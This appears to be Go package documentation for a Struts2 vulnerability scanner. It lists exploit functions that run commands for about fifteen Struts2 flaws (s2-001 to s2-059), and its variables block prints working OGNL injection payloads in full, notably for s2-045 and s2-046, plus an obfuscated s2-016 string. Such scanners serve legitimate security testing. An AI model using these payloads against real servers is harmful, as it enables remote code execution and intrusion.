Documentation
¶
Index ¶
- Variables
- func CreateHash(s string) string
- func Get302Location(targetUrl string) string
- func GetBetweenStr(str, start, end string) string
- func GetFunc4Struts2(pUrl string, getParam string, st2Payload string) string
- func IfContainsStr(rspBody string, clearFlag string) bool
- func POC_s001_exec(command string) string
- func POC_s005_exec(command string) string
- func POC_s007_exec(command string) string
- func POC_s008_exec(command string) string
- func POC_s009_exec(param string, command string) string
- func POC_s012_exec(command string) string
- func POC_s013_exec(command string) string
- func POC_s015_exec(command string) string
- func POC_s016_exec(command string) string
- func POC_s045_exec(command string) string
- func POC_s046_exec(command string) string
- func POC_s048_exec(command string) string
- func POC_s053_exec(command string) string
- func POC_s057_exec(command string) string
- func POC_s059_exec(command string) string
- func PostFunc4Struts2(pUrl string, postData string, contentType string, st2Payload string) string
Constants ¶
This section is empty.
Variables ¶
View Source
var ( Vnlist = [...]string{"struts2-001", "struts2-005", "struts2-007", "struts2-008", "struts2-009", "struts2-012", "struts2-013", "struts2-015", "struts2-016", "struts2-045", "struts2-046", "struts2-048", "struts2-053", "struts2-057"} Checkflag = CreateHash("ST2SG") Timeout = time.Second * 3 GlobalUserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" POC_s001_webpath = "" /* 325-byte string literal not displayed */ POC_s005_webpath = "" /* 688-byte string literal not displayed */ POC_s016_webpath = "" /* 301-byte string literal not displayed */ POC_s045_webpath = "" /* 756-byte string literal not displayed */ POC_s046_webpath = "" /* 769-byte string literal not displayed */ POC_s001_check = "%25%7B3154%2B3154%7D" POC_s005_check = POC_s005_exec("echo%20" + Checkflag) POC_s007_check = "%27%2B%28%23%7B3154%2B3154%7D%29%2B%27" POC_s008_check = POC_s008_exec("echo%20" + Checkflag) POC_s009_check = POC_s009_exec("name", "echo%20"+Checkflag) // POC_s012_check = "%25%7B3154%2B3154%7D" //表达式判断法,需要获取一下location POC_s012_check = POC_s012_exec("echo " + Checkflag) POC_s013_check = "?test=%24%7B3154%2b3154%7D" POC_s015_check = "/$%7B(3154+3154)%7D.action" POC_s016_check = "?redirect%3A%24%7B3154%2B3154%7D" // 表达式判断需获取location // POC_s016_check = "?redirect:$%7b%23req%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.print%28%22"+Checkflag+"%22%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29%7d" POC_s045_check = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('" + Checkflag + "')).(#res.getWriter().flush()).(#res.getWriter().close())}" POC_s046_check = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('" + Checkflag + "')).(#res.getWriter().flush()).(#res.getWriter().close())}\x00b" POC_s048_check = "%24%7B3154%2B3154%7D" POC_s053_check = "%25%7B3154%2B3154%7D%0D" // POC_s057_check = "/%24%7B3154%2b3154%7D" POC_s057_check = "/%24%7B3154%2B3154%7D" POC_s059_check = "%25%7B3154*3154%7D" )
Functions ¶
func CreateHash ¶
func Get302Location ¶
func GetBetweenStr ¶
func IfContainsStr ¶
func POC_s001_exec ¶
func POC_s005_exec ¶
func POC_s007_exec ¶
func POC_s008_exec ¶
func POC_s009_exec ¶
func POC_s012_exec ¶
func POC_s013_exec ¶
func POC_s015_exec ¶
func POC_s016_exec ¶
func POC_s045_exec ¶
func POC_s046_exec ¶
func POC_s048_exec ¶
func POC_s053_exec ¶
func POC_s057_exec ¶
func POC_s059_exec ¶
Types ¶
This section is empty.
Source Files
Click to show internal directories.
Click to hide internal directories.